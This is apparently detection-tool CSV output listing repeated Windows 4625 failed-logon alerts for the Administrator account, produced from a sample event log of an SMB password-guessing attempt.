2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
